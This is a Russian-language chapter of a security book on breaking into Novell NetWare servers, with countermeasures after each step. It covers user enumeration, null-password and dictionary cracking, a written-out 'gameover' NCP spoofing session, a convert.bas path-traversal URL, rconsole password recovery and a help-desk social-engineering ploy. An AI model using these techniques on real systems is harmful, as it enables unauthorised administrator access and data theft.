    Мы используем утилиту userinfo версии 1.04, которая изначально называлась NetWare User Information Listing. Написанная Тимом Швабом (Tim Schwab), утилита позволяет быстро получить дамп всех пользователей, содержащихся в структуре связки сервера. Утилита userinfo позволяет также осуществлять поиск по одному имени пользователя. Для этого достаточно указать его в качестве параметра. Как видно из следующего рисунка, присоединившись к серверу SECRET и запустив утилиту userinfo, можно извлечь имена всех пользователей системы, включая идентификатор каждого пользовательского объекта (object JD).


    userdump



    Утилита userdump версии 1.3 Роя Коуша (Roy Coates) аналогична userinfo в том, что отображает все пользовательские имена на присоединенном сервере, однако в то же время она предоставляет и полные имена, как видно из следующего рисунка. Эта информация может пригодиться взломщикам для выполнения задач социальной инженерии. Например, можно позвонить в отдел технической поддержки компании и попросить обнулить пароль пользователя, имя которого стало известно.


    finger



    Для инвентаризации пользователей системы нет необходимости использовать утилиту finger. Однако мы включили ее в этот раздел, поскольку она оказывается полезной, когда требуется определить, существует ли в системе определенный пользователь. Например, взломщик мог проникнуть на компьютер под управлением системы NT или UNIX и получить несколько имен пользователей и паролей. Кроме того, ему известно, что (а) пользователи зачастую имеют учетные записи на других узлах и (б) для простоты они пользуются одним и тем же паролем. Следовательно, полученными пользовательскими именами и паролями взломщик может воспользоваться для проникновения в другие системы, например серверы Novell. Для поиска пользователей в системе просто введите команду finger <имя-пользователя>.
    При запуске утилиты finger соблюдайте осторожность, поскольку она может оказаться слишком "шумной". По непонятным причинам, если finger применяется для поиска зарегистрированного в данный момент пользователя, на рабочем столе иногда появляется диалоговое окно системы NetWare с пустым сообщением.

    bindery



    Выявить пользователей, имеющихся на сервере, очень важно. Однако для того чтобы предпринять попытку проникновения, взломщику необходимо иметь в своем распоряжении немного больше информации. Например, кто из пользователей принадлежит к группе администраторов9 Программа NetWare Bindery Listing версии 1.16, разработанная компанией Manth-Brownell, Inc., предоставляет информацию практически о любом объекте связки (bindery object) (рис. 7.1). Программа bindery позволяет также отправить запрос об одном пользователе или группе. Например, просто введите команду bindery admins, чтобы получить список членов группы Admins. Параметр /В пригодится при одновременном просмотре большого количества объектов, поскольку в этом случае вывод информации будет выполняться по одной строке для каждого объекта.



    Рис.7.1. Программа bindery предоставляет о системе NetWare огромное количество информации, в том числе принадлежность к группе (например, Admins)

    bindin



    Как и программа bindery, bindin позволяет просмотреть различные объекты, такие как серверы, пользователи и группы, однако имеет более организованный интерфейс. Как и bindery, утилита bindin позволяет извлечь и данные о членстве в группах. Так что с ее помощью можно получить список пользователей из наиболее важных групп, таких как MIS, IT, ADMINS, GENERALADMINS, LOCALADMINS И Т.Д.

    •  Введите команду bindin u, чтобы получить с сервера список всех пользователей. 
    •  Введите команду bindin g, чтобы получить перечень всех групп и их членов.

    nlist



    Утилита nlist содержится в папке SYS: PUBLIC системы NetWare и заменяет  утилиту NetWare З.д: si 1st, позволяющую просматривать все серверы сети NetWare. В то же время утилита nlist предоставляет гораздо более широкие возможности, а именно позволяет просматривать данные о пользователях (user), группах (group), серверах (server), очередях (queue) и томах (volume). В основном она служит для получения перечня пользователей на сервере Novel и групп, к которым они принадлежат.

    •  nlist user /d. Отображается информация о заданных пользователях сервера в стандартном формате.
    •  nlist groups /d. Отображаются данные о группах сервера вместе с их членами.
    •  nlist server /d. Отображается информация обо всех серверах сети.
    •  nlist /ot=* /dyn /d. Предоставляются данные обо всех объектах, как видно из следующего рисунка.


    Утилиту nlist особенно полезно использовать для получения свойств объекта, таких как должность (title), фамилия (surname), номер телефона (phone number) и др.

    СХ



    Небольшая утилита Change Context (сх) при каждой установке системы NetWare 4.x помещается в папку SYS: PUBLIC. Она отображает информацию о дереве NDS или о его небольшой части. Эта утилита оказывается чрезвычайно полезной при поиске определенных объектов внутри дерева. Например, если на определенном сервере взломщик узнал пароль пользователя ECULP, то с помощью утилиты сх можно выполнить поиск во всем дереве NDS других серверов, которые способны аутентифицировать данного пользователя. Вот несколько примеров использования утилиты сх.
    Для изменения текущего контекста на [ROOT] введите команду сх /r
    Для изменения текущего контекста и перехода в дереве на один объект вверх введите команду сх .
    Для задания определенного контекста введите команду сх .engineering.newyork.hss
    При задании контекста относительно [ROOT] убедитесь, что в начале указан символ . (точка), как в предыдущем примере.
    Для вывода списка всех объектов-контейнеров, расположенных в текущем контексте или ниже него, воспользуйтесь командой сх/t
    Для вывода списка всех объектов, расположенных в текущем контексте или ниже него, воспользуйтесь командой сх /t /a
    Для просмотра всех объектов в заданном контексте введите команду сх .engineering.newyork.hss /t /a
    И наконец, для вывода всех объектов, начиная с [ROOT], введите команду сх /t /а /r
    Если требуется получить структуру всего дерева NDS, просто введите команду ex /t /а /г, как показано на рис. 7.2.



    Рис. 7.2. На основе информации, полученной с помощью утилиты сх, взломщик может узнать практически все об инфраструктуре NetWare

    Если при использовании команд сх у вас возникают проблемы (например, генерируются такие ошибки, как сх-4 .20-240), то в дальнейшем лучше прибегнуть к утилите просмотра дерева On-Site, которая подробно рассматривается ниже в данной главе. Подобная проблема иногда возникает при удаленных соединениях с сетью. При этом генерируются такие ошибки, как

    СХ-4.20-240: The context you want to change to does not exist.
    You tried to change to: ACME
    Your context will be left unchanged as: [Root]

    On-Site Administrator



    Как вы узнали из главы 3, по умолчанию система NetWare разрешает просматривать все дерево NDS любому пользователю. Данные, полученные в результате просмотра дерева, могут оказаться чрезвычайно полезными для взломщика, поскольку графически отображают каждый объект дерева, включая контейнеры, серверы, пользователей, группы, принтеры и т.д.
    Возможности по инвентаризации каждого контейнера в дереве NDS, обеспечиваемые утилитой сх, предоставляет также графическая подсистема утилиты On-Site. TreeForm. С ее помощью в виде дерева можно отобразить каждое дерево, контейнер и объекты-листья, как показано на рис. 7.3.



    Рис. 7.3. Просмотреть все деревья NDS в сети можно с использованием утилиты On-Site, просто щелкнув на кнопке Tree панели инструментов. Не забывайте о том, что перед тем, как приступить к просмотру дерева, нужно создать нача.1ьное соединение с сервером

    Контрмеры против инвентаризации



    Защититься от прав просмотра [PUBLIC] объекта [ROOT] , устанавливаемого в системе NetWare 4.x по умолчанию, можно двумя способами. Наши рекомендации можно найти в главе 3.


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    4. Поиск "незакрытых" дверей



    Поиск "незакрытых" дверей


    После того как взломщики составили представление о самом "здании" (пользователях и серверах), можно перейти к подбору ключей к дверным замкам (подбору паролей). Наиболее вероятно, что для решения этой задачи взломщики попробуют зарегистрироваться. Сейчас в их распоряжении имеются все имена пользователей. Осталось лишь узнать несколько паролей.

    chknull



    Для взломщика (и администратора) чрезвычайно важное значение имеют несколько утилит системы NetWare, в частности chknull. Эта утилита имеется на серверах NetWare 3.x и 4.x, на которых установлен контекст связки. Она оказывается абсолютно бесценной как для взломщиков, так и для администратора, и позволяет выполнять поиск пустых или легко подбираемых паролей. Не забывайте о том, что при создании новой учетной записи система NetWare не требует задания пароля (если не используется соответствующий шаблон). В результате многие пользовательские учетные записи создаются с нулевыми паролями, оставляя тем самым "широко распахнутые двери" на многие серверы Novell. Эту проблему усложняет еще то обстоятельство, что для многих пользователей простота важнее обеспечения безопасности. В результате подавляющее большинство пользователей применяют легко запоминающиеся пароли (что зачастую приводит к нарушению политики обеспечения безопасности).
    Используйте утилиту chknull для выявления легко подбираемых паролей на сервере NetWare.

    Usage: chknull [-p] [-n] [-v] [wordlist .,.]
    -p : подстановка в качестве пароля имени пользователя
    -n : не проверять пустые пароли
    -v : подробный отчет
    а также использование в качестве пароля слов,
    указанных в командной строке

    Примечательной особенностью поиска нулевых паролей является то, что при каждой попытке запись о неудачной попытке регистрации не создается.
    С использованием утилиты chknull можно без проблем осуществить поиск паролей, совпадающих с именем пользователя, и пустых паролей. Как видно из следующего рисунка, многие пользователи не имеют паролей и лишь один из них, JBENSON, использует пароль, совпадающий со своим именем.


    Последний параметр утилиты chknull (поддерживающий поиск паролей по словам, заданным в командной строке) работает не всегда, так что не стоит возлагать на него большие надежды.

    Если в процессе инвентаризации сервера возникли проблемы с использованием утилиты chknull, проверьте наличие основного сервера (его можно задать, щелкнув на кнопке Set Primary). Сделать это можно в диалоговом окне NetWare Connections.

    Контрмеры против использования chknull



    Защититься от утилиты chknull очень просто. Однако в зависимости от конкретной ситуации все же могут возникнуть различные трудности. Любая из следующих рекомендаций позволит воспрепятствовать успешному применению утилиты chknull.

    •  Удалите контекст связки с серверов NetWare 4.x. Отредактируйте файл autoexec.cnf и удалите из него строку с командой SET BINDERY. Помните о том, что это может повлиять на клиентов NETX и VLM, успешная регистрация которых может зависеть от контекста связки.
    •  Реализуйте политику обеспечения безопасности на уровне корпорации и требуйте наличия паролей у всех пользователей.
    •  Требуйте, чтобы минимальная длина пароля составляла 6 символов (USERJTEMPLATE).
    •  Отключите возможность просмотра дерева (см. главу 3).
    •  Включите режим выявления вторжений. Щелкните правой кнопкой мыши на каждом контейнере (ои) и выполните следующие действия.
    1. Выберите команду Details.
    2. Перейдите во вкладку Intruder Detection и установите флажки Detect intruders и Lock account after detection. Измените параметры в соответствии с рекомендациями, приведенными в таблице раздела "Контрмеры: Защита От Утилиты Nwpcrack" ниже в данной главе.



    7.gif

    Изображение: 

    5. Инвентаризация после аутентификации



    Инвентаризация после аутентификации


    Теперь понятно, как много информации предоставляют серверы NetWare. Вас это еще не испугало? Прекрасно, после аутентификации взломщики смогут получить еще больше данных.
    После получения нескольких имен пользователей и паролей с использованием утилиты chknull взломщики наверняка предпримут попытку регистрации на сервере с помощью программы DOS login.exe, On-Site или программы регистрации клиента Client32. После успешной аутентификации можно получить еще больше информации, воспользовавшись ранее рассмотренной программой (On-Site) и новыми утилитами (userlist и NDSsnoop).

    userlist /a



    Утилиту userlist нельзя использовать просто после соединения с сервером, так что предварительно нужно узнать корректное имя пользователя и пароль (с помощью chknull). Она предоставляет те же возможности, что и программа On-Site, однако используется в командной строке, что позволяет применять ее в сценариях (см. рисунок ниже).


    Утилита userlist предоставляет взломщику важную информацию, включая полный адрес сети и узла, а также время регистрации.

    On-Site Admin



    После аутентификации на сервере NetWare можно снова воспользоваться программой On-Site, уже для просмотра всех текущих соединений с сервером. Просто выберите с помощью мыши требуемый сервер, а затем щелкните на кнопке Analyze. В результате будет получена основная информация не только о томе, но и обо всех текущих соединениях (рис. 7.4).
    При установке с помощью программы On-Site аутентифицированного сеанса можно просмотреть каждое соединение NetWare с сервером. Для взломщиков такая информация очень важна. Как вы увидите чуть ниже, она поможет им получить привилегии администратора.



    Рис. 7.4. Данные о соединениях, полученные с помощью программы On-Site, позже пригодятся для получения прав администратора

    NDSsnoop



    В различных ситуациях программа NDSsnoop может принести различную пользу. Однако если вы сможете ею воспользоваться, то это окажется чрезвычайно полезным. После успешного прохождения аутентификации программу NDSsnoop можно применять для просмотра в графическом режиме подробных данных обо всех объектах и свойствах (подобно утилите nlist /ot = * /dyn /d, рассмотренной выше), включая свойство Equivalent To Me.
    Как видно из рис. 7.5, программу NDSsnoop можно использовать для просмотра жизненно важной информации об объектах дерева, в том числе свойства Equivalent To Me и Last Login Time.

    Проверка активности режима блокировки вторжений



    Этот режим является встроенной возможностью системы NetWare. При его включении учетная запись пользователя будет заблокирована после заданного числа неудачных попыток регистрации. К сожалению, по умолчанию режим блокировки вторжений (intruder lockout) отключен. Этот режим должен быть всегда включен. Его очень важно использовать для отражения атак взломщиков, направленных на получение доступа к серверу. После установки соответствующего флажка (рис. 7.6) убедитесь, что требуемые изменения внесены и в свойства каждого контейнера дерева.



    Рис. 7.5. С использованием утилиты ND.Ssnoop можно просмотреть подробную информацию о каждом объекте. Иногда с ее помощью удается определить пользователей, обладающих привилегиями администратора



    Рис. 7.6. Если режим блокировки вторжений отключен, то вы, возможно, никогда не узнаете о взломе

    Как только взломщик приготовился атаковать определенного пользователя, обычно он предпринимает попытку определить, включен ли режим блокировки вторжений. Если да, то потребуется быть гораздо более осторожным. Вы будете удивлены, как много администраторов пренебрегают этой возможностью. Возможно, это происходит из-за недостатка знаний, недостаточного понимания важности использования этого режима или просто из-за слишком большой нагрузки по администрированию. Вот описание методологии, зачастую применяемой для определения состояния режима блокировки вторжений.
    В окне регистрации Client32 попробуйте несколько раз зарегистрироваться в качестве известного пользователя. Вполне вероятно, что будут использоваться неправильные пароли, так что почти наверняка на экране появится диалоговое окно со следующим сообщением.
    При выводе на экран другого диалогового окна (см. рисунок ниже) становится очевидно, что используемая учетная запись заблокирована.


    И на системной консоли появится следующее сообщение.

    4-08-99 4:29:28 pm: DS-5.73-32
    Intruder lock-out on account estein.HSS
    [221E6EOF:0000861CD947]
    4-08-99 4:35:19 pm: DS-5.73-32
    Intruder lock-out on account tgoody.HSS
    [221E6EOF:0000861CD947]

    После около двадцати неудачных попыток регистрации без получения сообщения login failure status с достаточной степенью вероятности можно сказать, что режим блокировки вторжений на исследуемом сервере отключен.

    Контрмеры против проверки активности режима блокировки вторжений



    Мы не знаем способов, с помощью которых можно обнаружить взломщиков, пытающихся проверить, включен ли режим блокировки вторжений. Насколько нам известно, подавить отображение подобных сообщений в системе NetWare нельзя. Лучше всего проявлять настойчивость и постоянно следить за сообщениями на консоли сервера. Кроме того, отслеживайте до конца все случаи подозрительной блокировки независимо от того, насколько важным это может показаться.


    8.gif

    Изображение: 

    9.gif

    Изображение: 

    10.gif

    Изображение: 

    11.gif

    Изображение: 

    12.gif

    Изображение: 

    6. Получение привилегий администратора



    Получение привилегий администратора


    Как было продемонстрировано выше, в большинстве случаев получить доступ на уровне пользователей очень просто. Для этого достаточно воспользоваться утилитой chknull, чтобы обнаружить пользователей без паролей, либо прибегнуть к их подбору. Следующим шагом большинства взломщиков будет получение прав администратора на сервере или дереве. Для решения этой задачи существует два основных метода:

    •  "захват" (pillage) сервера (традиционный метод), 
    •  ложные атаки NCP.

    Несанкционированное получение данных



    На этой стадии многие злонамеренные взломщики будут предпринимать попытки несанкционированного получения данных. Другими словами, они будут пытаться зарегистрироваться везде, где это возможно, и найти доверчивых пользователей, хранящих пароли в незашифрованном виде. Такой подход способен принести гораздо больше выгоды, чем это может показаться на первый взгляд.
    Несанкционированное получение данных (pillaging), скорее всего, похоже на "черную магию", и этот процесс очень трудно продемонстрировать. Лучше всего в поисках подсказок и намеков просто просматривать каждый доступный файл. Никогда нельзя знать наверняка, однако в какой-то момент можно обнаружить даже пароль администратора. Со структурой корня тома SYS можно "познакомиться", воспользовавшись командой map n secret/sys:\ или с помощью программы On-Site. Просмотрите каждый доступный каталог. К числу каталогов, в которых содержатся интересные файлы, относятся следующие:

    •  SYS:SYSTEM
    •  SYS:ETC
    •  SYS:HOME
    •  SYS:LOGIN
    •  SYS:MAIL A SYS:PUBLIC

    He забывайте о том, что пользователь, с помощью учетной записи которого вы зарегистрировались, может и не иметь доступа ко всем этим каталогам. Однако вы можете оказаться счастливчиком. Каталоги SYSTEM и ETC особенно важны, поскольку в них содержатся жизненно важные конфигурационные файлы сервера. Их может просмотреть лишь пользователь с правами администратора.

    Контрмеры против несанкционированного получения данных



    Контрмеры, позволяющие предотвратить попытки взломщика несанкционированно получить данные на томах NetWare просты и очевидны. Оба совета предполагают ограничение прав пользователей.

    •  С помощью утилиты filer назначьте ограниченные права доступа ко всем томам, каталогам и файлам.
    •  С использованием утилиты Nwadamn3x назначьте ограниченные права доступа ко всем объектам дерева NDS, включая Organization, Organizational Unit, серверы, пользователей и т.д.

    nwpcrack



    Утилита nwpcrack представляет собой средство взлома паролей систем NetWare 4.x С ее помощью можно взломать пароль определенного пользователя с использованием словаря. В приведенном примере была обнаружена группа администраторов. После регистрации в качестве пользователя появляется возможность увидеть пользователей, имеющих права, эквивалентные администраторам, или просто тех из них, кто является членом группы администраторов, MIS и т.д. Проделав это, в группе администраторов были обнаружены пользователи DEOANE и JSYMOENS. Именно с них и стоит начать атаку.
    Запустив утилиту nwpcrack для пользователя DEOANE, нам удалось взломать его пароль, как видно из следующего рисунка. Теперь мы обладаем привилегиями администратора на данном сервере и можем получить доступ к любому из объектов, доступных этому пользователю.


    Не пытайтесь применять утилиту nwpcrack к учетным записям администраторов, если включен режим блокировки вторжений. В противном случае может быть заблокирована учетная запись за пределами дерева. Перед тестированием с помощью утилиты nwpcrack учетной записи ADMIN (или эквивалентной) нужно создать ее резервную копию. В системе Windows NT не может возникнуть подобного состояния DoS, поскольку в ней нельзя заблокировать исходную учетную запись администратора, если не используется дополнительная утилита из набора NTRK, passprop. Если с помощью утилиты nwpcrack будет обнаружен активный режим выявления вторжений, то вы получите сообщение tried password«password» с тем же паролем, выведенным повторно. Это будет свидетельствовать о том, что сервер NetWare больше не будет принимать запросы на регистрацию от этого пользователя. Тогда нужно нажать комбинацию клавиш <Ctrl+C>, чтобы выйти из программы, поскольку в противном случае на консоли сервера появится хорошо знакомое сообщение DS-5.73-32: intruder lock-out on account Admin ("Блокирование вторжения для учетной записи Admin"). А это совсем не входит в планы взломщика.

    Контрмеры: защита от утилиты nwpcrack



    Защититься от подбора пароля пользователей (скорее всего, администраторов) с помощью утилиты nwpcrack очень просто. Вот некоторые рекомендации.

    •  Реализуйте строгую политику использования паролей. Компания Novell не предоставила простого решения этой проблемы. Ее позиция по этому вопросу заключается в том, что администраторы могут ввести строгий режим использования паролей лишь посредством следования принятой политике обеспечения безопасности. Это сильно отличается от позиции компании Microsoft, которая с помощью динамически подключаемой библиотеки passfilt.dll позволяет ограничить типы паролей, которые можно использовать, принудительно задавая минимальную длину паролей и обязательные метасимволы (например, !@#$%). Как минимум нужно требовать, чтобы пользователи использовали пароли определенной длины и избегали повторений. Длину пароля проще всего контролировать С ПОМОЩЬЮ Переменной USER_TEMPLATE.
    •  Включите режим выявления вторжений и блокирование учетных записей. Выделите нужный контейнер (Organizational Unit), а затем выберите команду Details. Щелкните на кнопке Intruder Detection и задайте для параметров требуемые значения. По умолчанию рекомендуется установить следующие значения.

    Detect Intruders  Включен
    Incorrect login attempts &nb 3
    Intruder attempt reset interval (Days)      14
    Intruder attempt reset interval (Hours)     0
    Intruder attempt reset interval (Minutes)  0
    Lock account after detection   &nbssp;  Включен 
    Intruder lockout reset interval (Days)      7
    Intruder lockout reset interval (Hours)     0
    Intruder lockout reset interval (Minutes)  0


    13.gif

    Изображение: 

    7. Изъяны приложений



    Изъяны приложений


    В терминах служб TCP/IP после установки системы NetWare по умолчанию используется лишь несколько открытых портов, включая Echo (7) и Chargen (19) — не очень много для потенциальных атак (за исключением очевидной генерации состояния отказа в обслуживании, DoS). Однако при добавлении служб Web, FTP, NFS и telnet появляются новые открытые порты, такие как 53, 80, 111, 888, 893, 895, 897, 1031 и 8002.
    При добавлении новых служб повышается и гибкость. Это, в свою очередь, приводит к многочисленным изъянам, проявляющимся на протяжении многих лет, которые могут быть использованы для получения авторизованного доступа.

    Сценарии Perl в системе NetWare



    Первоначально проблема была обнаружена в начале 1997 года, так что если вы используете более ранние версии системы NetWare 4.x или IntraNetWare, то потери защищенности может и не возникнуть. Однако суть проблемы заключается в том, что взломщик может выполнять сценарии Perl из любого места тома, включая рабочие каталоги пользователей и системные каталоги, такие как LOGIN и MAIL.
    В результате вполне вероятно, что взломщику удастся создать сценарий на языке Perl, позволяющий отобразить содержимое важных файлов в броузере, например autoexec, ncf или Idremote .ncf, в которых хранится пароль утилиты rconcole.

    Контрмеры: защита от сценариев Perl



    К сожалению, предлагаемая контрмера далеко не идеальна и заключается в том, чтобы либо полностью отказаться от использования службы, либо обновить ее до новой версии. Другими словами, выполните одно из следующих действий.

    •  Введите на системной консоли команду unload peri 

    или 

    •  Обновите Web-сервер системы NetWare до версии 3.0. Его самую последнюю версию можно загрузить с узла по адресу http://www.support.novell.com.

    Служба FTP системы NetWare



    Этот изъян средств поддержки FTP присутствует лишь в исходной FTP-службе IntraNetWare. Конфигурационные параметры, используемые по умолчанию, разрешают анонимным пользователям доступ File Scan к каталогу SYS:ETC. В этом каталоге содержится файл netinfo.cfg (и другие важные конфигурационные файлы).
    Для того чтобы проверить, уязвим ли ваш сервер при использовании такого приема, выполните следующее.
    1. В Web-броузере введите следующий адрес URL: ftp://ftp.server.com/
    2. Если вам удалось получить анонимный доступ, попробуйте просмотреть каталог SYS: ETC. Если вы смогли увидеть файлы в этом каталоге, значит, ваш сервер уязвим.

    Контрмеры: защита службы FTP



    Принципы зашиты службы FTP системы NetWare аналогичны контрмерам против использования сценариев Perl. Необходимо либо запретить использование службы либо обновить программное обеспечение.

    •  Замените файл ftpserv.nlm на его более новую версию. Ее можно найти по адресу http://www.support.novell.com.  
    • Запретите анонимный FTP-доступ. 
    •  Воспользуйтесь файлом unicon.nlm и удалите службу FTP.

    Версия ftpserv.nlm для системы NetWare 4.11 по умолчанию запрещает анонимный доступ пользователей.

    Web-сервер NetWare



    Об уязвимости Web-сервера системы NetWare стало известно в 1996 году. Более ранние версии Web-сервера системы NetWare 4.x не способны проверять параметры, передаваемые его файлу convert.bas сценариями на языке Basic. В результате взломщики могут без проблем увидеть любой файл системы, включая autoexec.ncf, Idremote.ncf и netinfo.cfg. Для проверки степени уязвимости вашего сервера выполните следующие действия.
    1. Воспользовавшись строкой ввода адреса URL Web-броузера, вызовите исследуемый сценарий (convert. bas) и передайте ему в качестве параметра имя системного файла. Например, http://www.server.com/scripts/convert.bas?../..
    /system/autoexec.ncf

    2. Если вы увидели содержимое файла autoexec.ncf, значит, Web-сервер уязвим.

    Контрмеры: защита Web-сервера NetWare



    Выполните обновление до самой последней версии Web-сервера компании Novell, обратившись по адресу http://www.support.novell.com, или как минимум до версии 2.51R1, Компанией Novell были исправлены сценарии Basic, содержащиеся в каталоге SCRIPTS. Теперь с их помощью можцо открыть лишь определенные файлы, перечень которых жестко ограничен.


    8. Ложные атаки (PANDORA)



    Ложные атаки (PANDORA)


    Если все предыдущие попытки получения привилегий администратора закончились неудачей, то можно прибегнуть к нескольким ложным атакам с применением пакетов NCP. Средства для осуществления таких атак разработаны в центре исследований NMRC (Nomad Mobile Research Center, http://www.nmrc.org) и называются Pandora (http://www.nmrc.org/pandora/download.html). В настоящее время доступна версия 4.0, однако в данной книге рассматриваются возможности версии 3.0. Для работы пакета Pandora необходимо выполнение нескольких обязательных условий.

    •  Работа с сетевым адаптером должна осуществляться посредством связанного с ним драйвера пакетов (packet driver). Такой драйвер имеется в комплекте поставки лишь определенных сетевых адаптеров. Уточните у производителя, поддерживается ли вашей NIC драйвер пакетов. Можете считать, что вам крупно повезло, если ваш сетевой адаптер изготовлен такими производителями, как Netgear, D-Link и 3Com. Драйвер пакетов необходим также для перехвата прерывания 0x60.
    •  Чтобы пакет Pandora мог функционировать, должна быть загружена поддержка интерфейса DPMI (DOS Protected Mode Interface — интерфейс защищенного режима DOS). Необходимые файлы можно загрузить с Web-узла, адрес которого приведен выше.
    •  В дереве нужно найти контейнер, в котором содержится как объект Admin (или с эквивалентными правами), так и пользователь, пароль которого известен.

    gameover



    Одного имени утилиты gameover вполне достаточно, чтобы узнать, для чего она предназначена. Утилита gameover позволяет взломщику предоставить пользователю привилегии, эквивалентные администратору. Это достигается с помощью передачи серверу 4.x ложного NCP-запроса, в результате чего им будет обработан запрос SET EQUIVALENT TO.
    Для того чтобы установить клиента DOS/Win95, выполните следующие действия.
    1. Перейдите в режим DOS.
    2. Загрузите драйвер пакетов (например, производства компании D-Link): dc22xpd
    3. Загрузите поддержку интерфейса DPMI: cwsdpmi
    Теперь, воспользовавшись информацией о пользователе, полученной с помощью приложения On-Site (рис. 7.7), можно приступить к своему "черному делу".



    Рис. 7.7. Теперь взломщик может приступить к своему "черному делу"

    Запустите утилиту gameover следующим образом.

    Gameover<cr>
    Server internal net (4 bytes hex)
    36FCC65D<cr>
    Server address (6 bytes hex)
    000000000001<cr>
    File server connection number (irit)
    most probably '!' (seen as: '*<server_name>.<server.context>')
    4<cr>
    Server socket high (1 byte hex)
    most probably '40' 40<cr>
    Server socket low (1 byte hex)
    Most probably '07' 39<cr>
    User name to gain rights
    (does NOT have to be currently connected)
    eculp<cr>
    User name to get rights from
    (does not have to be currently connected)
    Admin<cr>
    Spoofing: Done.

    После этого можно зарегистрироваться в качестве пользователя ECULP и получить права администратора. Здорово, не правда ли?
    В пакете Pandora содержится и много других утилит, заслуживающих внимания. Две другие утилиты, levell-1 и level3-1. также предназначены для передачи ложных NCP-запросов, как и gameover. Их использование также приводит к обработке запроса SET EQUIVALENT, однако при этом объекты-пользователи могут располагаться в различных контекстах. Такую возможность в лабораторных условиях нам проверить не удалось.
    Утилиты extract, crypto и crypto2 предназначены для взлома паролей NDS и будут рассмотрены ниже в данной главе. Утилита havoc является прекрасным инструментом для выполнения атаки DoS.

    Контрмеры: защита от утилит Pandora



    Для защиты от утилит из пакета Pandora существует много различных способов, и их перечень во многом зависит от архитектуры узла NetWare. Вообще, для предотвращения хакинга с применением описанных средств нужно следовать следующим рекомендациям:

    •  Никогда не помещайте пользователя Admin (или эквивалентного) в тот же контейнер, в котором содержатся другие пользователи.
    •  Установите самый новый пакет обновления Support Pack 6 (IWSP6.EXE), который можно найти по адресу ftp://ftp.novell.com/pub/updates/nw/ nw411/iwsp ехе. При этом файл DS.NLM будет замещен его новой версией. Ее можно свободно получить по адресу http://www.support.novell.com.
    •  Перед запуском файла DS.NLM добавьте команду SET PACKET SIGNATURE OPTION=3 либо в конец файла autoexec.ncf, либо в начало файла startup.ncf.
    •  В сценарии autoexec, ncf можно также вызвать сценарий SYS:SYSTEMXsecure, ncf. При этом для того же и нескольких других параметров будут установлены требуемые значения, однако снова убедитесь в том, что сценарий вызывается в начале файла autoexec.ncf. Откройте файл secure.ncf и удалите символы комментария В строке SET PACKET SIGNATURE OPTION=3.



    14.gif

    Изображение: 

    9. Получив права администратора на сервере...



    Получив права администратора на сервере...


    С этого момента самая тяжелая часть работы взломщика осталась позади. Теперь в его распоряжении права администратора сервера и, скорее всего, значительная часть дерева. Следующим шагом является получение доступа к утилите rconsole сервера и сбор файлов NDS.

    Хакинг утилиты rconsole



    Получить пароль к утилите rconsole можно несколькими способами, однако на самом деле существует лишь один простой путь, который зависит от степени медлительности администратора. По умолчанию пароль к утилите rconsole хранится в виде незашифрованного текста. Это можно проверить следующим образом.
    1. Просмотрите файл SYS: \SYSTEM\autoexec.ncf.
    2. Найдите строку load remote. В качестве следующего параметра должен быть указан пароль, который, возможно, будет представлять незашифрованный текст. load remote ucantcme
    3. Если после строки remote пароля нет, а вместо него указан параметр -Е, то вас можно поздравить - как минимум, администратор зашифровал пароль утилиты rconsole.
    load remote -E 158470C4111761309539DO
     Однако упрямому взломщику это лишь добавит еще один шаг на пути получения полного контроля над системой. Хакер Мечтатель (Dreamer, или Разрушитель, TheRuiner) разобрался с алгоритмом, применяемым при шифровании пароля утилиты rconsole, и написал исходный код на языке Pascal, который можно использовать для получения этого пароля (http://www.nmrc.org/files/netware/remote.zip). Для расшифровки пароля можно использовать также написанный авторами книги сценарий Perl, который находится на Web-узле www.hackingexposed.com. Особенность использования этого сценария заключается в том, что нужно просто найти пароль утилиты rconsole (неважно, зашифрованный или нет). Если у вас имеется много времени, которое вы готовы потратить на поиск этого пароля, то воспользуйтесь следующими рекомендациями.

    •  Если вы не обнаружили строку load remote в файле autoexec.ncf, не отчаивайтесь; она может содержаться в другом файле NCF. Например, для хранения команды load remote по умолчанию обычно используется файл SYS: \SYSTEM\ldremote.ncf. Этот файл также можно просмотреть и проверить, не содержится ли в нем незашифрованный пароль.
    •  Если вы все еще не нашли строку load remote, то это может означать, что администратор воспользовался командой inetcfg и перенес команды из файла autoexec.ncf в файлы initsys.ncf и netinfo.cfg. Оба файла содержатся в каталоге SYS:ETC. При первом запуске программы inetcfg с консоли она пытается переместить все команды из файла autoexec.ncf в файл inetcfg. В результате в этом файле пароль должен содержаться в том же виде, что и в файле autoexec.ncf.

    Контрмеры против использования незашифрованных паролей утилиты rconsole



    Предотвратить такую опасность очень просто. Компания Novell предлагает механизм шифрования пароля утилиты rconsole с помощью команды remote encrypt. Вот что для этого необходимо сделать.
    1. Убедитесь, что не загружены утилиты rspx и remote.
    2. Введите с консоли команду load remote «пароль».
    3. С консоли введите команду remote encrypt.
    4. В ответ на появившийся запрос наберите пароль утилиты rconsole.
    5. На экране появится запрос о том, нужно ли добавить зашифрованный пароль в файл SYS: \SYSTEM\ldremote.ncf. Ответьте "да".
    6. Удалите все строки с паролем из файлов autoexec.ncf и netinfo.cfg.
    7. Убедитесь, что для вызова команды load remote в файл autoexec.ncf добавлен файл Idremote.ncf.

    В настоящее время не существует модулей обновления, позволяющих защититься от декодирования зашифрованных паролей утилиты rconsole (а ля Разрушитель!). Для получения самой свежей информации по этому вопросу регулярно обращайтесь ПО адресу http://oliver.efri.hr/~crv/security/bugs/
    Others/nwarel2.html
    . Сценарий Perl, позволяющий расшифровать этот пароль, (remote.pi), можно найти на нашем Web-узле www.hackingexposed.com


    10. Получение доступа к файлам NDS



    Получение доступа к файлам NDS


    После приобретения пароля утилиты rconsole осталось выполнить завершающий шаг — получить доступ к файлам NDS. В системе NetWare файлы NDS содержатся в скрытом каталоге _netware тома SYS. Доступ к этому каталогу можно получить лишь через доступ к консоли (для взломщика — утилите rconsole). Для "захвата" файлов NDS существует много методов. И как вы скоро убедитесь, у каждого взломщика имеются свои любимые приемы.

    netbasic. nlm (SYS: SYSTEM)



    Набор средств разработки программного обеспечения NetBasic представляет собой язык сценариев, который изначально был разработан компанией High Technology Software Corp. (для краткости HiTecSoft). С его помощью можно конвертировать сценарии NetBasic в формат NLM (NetWare Loadable Module) компании Novell и использовать их на Web-сервере системы NetWare. Компонент netbasic.nlm имеет уникальную особенность, которая изначально была обнаружена взломщиками: с его помощью из командной строки можно про смотреть весь том, включая скрытый каталог _netware.
